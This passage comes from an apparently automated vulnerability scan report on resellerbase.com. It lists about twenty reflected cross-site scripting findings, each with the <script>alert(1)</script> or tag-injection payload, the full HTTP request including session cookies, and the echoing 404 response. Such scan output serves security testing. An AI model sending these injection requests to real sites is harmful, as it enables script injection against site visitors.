<p>The requested URL /detail9afb7<script>alert(1)</script>46d0b782ee/35/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2358. http://www.resellerbase.com/detail/35/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef179<script>alert(1)</script>71b7e6084df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35ef179<script>alert(1)</script>71b7e6084df/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35ef179<script>alert(1)</script>71b7e6084df/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2359. http://www.resellerbase.com/detail/35/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2216b<script>alert(1)</script>46bb0c96031 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/search.php2216b<script>alert(1)</script>46bb0c96031?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php2216b<script>alert(1)</script>46bb0c96031?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2360. http://www.resellerbase.com/detail/35/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload da533<a>3aa991d5252 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/search.php?keyword=search...&Submit3=Searchda533<a>3aa991d5252&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...&Submit3=Searchda533<a>3aa991d5252&opt=2 was not found on this server.</p>
...[SNIP]...

2.2361. http://www.resellerbase.com/detail/35/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f1444<a>54d2c1d38b6 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/search.php?keyword=search...f1444<a>54d2c1d38b6&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...f1444<a>54d2c1d38b6&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2362. http://www.resellerbase.com/detail/35/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8cdc2<script>alert(1)</script>d16fd1f45d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/search.php?keyword=search...&Submit3=Search&opt=2&8cdc2<script>alert(1)</script>d16fd1f45d9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...&Submit3=Search&opt=2&8cdc2<script>alert(1)</script>d16fd1f45d9=1 was not found on this server.</p>
...[SNIP]...

2.2363. http://www.resellerbase.com/detail/35/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload a1060<a>e563294da6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/search.php?keyword=search...&Submit3=Search&opt=2a1060<a>e563294da6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/search.php?keyword=search...&Submit3=Search&opt=2a1060<a>e563294da6 was not found on this server.</p>
...[SNIP]...

2.2364. http://www.resellerbase.com/detail/35/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e5c8e<script>alert(1)</script>e43131ce73a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile5c8e<script>alert(1)</script>e43131ce73a/35/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2365. http://www.resellerbase.com/detail/35/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8825<script>alert(1)</script>05241d88c4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35c8825<script>alert(1)</script>05241d88c4c/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35c8825<script>alert(1)</script>05241d88c4c/themes/ was not found on this server.</p>
...[SNIP]...

2.2366. http://www.resellerbase.com/detail/35/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7e18<script>alert(1)</script>c8feaa9ba92 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themesb7e18<script>alert(1)</script>c8feaa9ba92/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themesb7e18<script>alert(1)</script>c8feaa9ba92/ was not found on this server.</p>
...[SNIP]...

2.2367. http://www.resellerbase.com/detail/35/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d181<script>alert(1)</script>e7aea65a21e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/?2d181<script>alert(1)</script>e7aea65a21e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/?2d181<script>alert(1)</script>e7aea65a21e=1 was not found on this server.</p>
...[SNIP]...

2.2368. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeb66<script>alert(1)</script>21538e0517c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaeb66<script>alert(1)</script>21538e0517c/35/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaeb66<script>alert(1)</script>21538e0517c/35/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2369. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6691b<script>alert(1)</script>0fb56cc6e41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/356691b<script>alert(1)</script>0fb56cc6e41/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/356691b<script>alert(1)</script>0fb56cc6e41/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2370. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5204<script>alert(1)</script>d8f9ede8773 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themesb5204<script>alert(1)</script>d8f9ede8773/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themesb5204<script>alert(1)</script>d8f9ede8773/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2371. http://www.resellerbase.com/detail/35/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85fe0<script>alert(1)</script>10865f016be was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos85fe0<script>alert(1)</script>10865f016be/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos85fe0<script>alert(1)</script>10865f016be/ was not found on this server.</p>
...[SNIP]...

2.2372. http://www.resellerbase.com/detail/35/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 60179<script>alert(1)</script>5d946f1d9b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/?60179<script>alert(1)</script>5d946f1d9b2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/?60179<script>alert(1)</script>5d946f1d9b2=1 was not found on this server.</p>
...[SNIP]...

2.2373. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2dbf<script>alert(1)</script>bc30d7c4935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile2dbf<script>alert(1)</script>bc30d7c4935/35/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile2dbf<script>alert(1)</script>bc30d7c4935/35/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2374. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de9d2<script>alert(1)</script>8bcd8bbfb55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35de9d2<script>alert(1)</script>8bcd8bbfb55/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35de9d2<script>alert(1)</script>8bcd8bbfb55/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2375. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55156<script>alert(1)</script>4533de85774 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes55156<script>alert(1)</script>4533de85774/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes55156<script>alert(1)</script>4533de85774/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2376. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 18450<script>alert(1)</script>f44a3a42066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos18450<script>alert(1)</script>f44a3a42066/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos18450<script>alert(1)</script>f44a3a42066/images/ was not found on this server.</p>
...[SNIP]...

2.2377. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8fd5b<script>alert(1)</script>f7ed79791d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images8fd5b<script>alert(1)</script>f7ed79791d1/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images8fd5b<script>alert(1)</script>f7ed79791d1/ was not found on this server.</p>
...[SNIP]...

2.2378. http://www.resellerbase.com/detail/35/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/

Issue detail

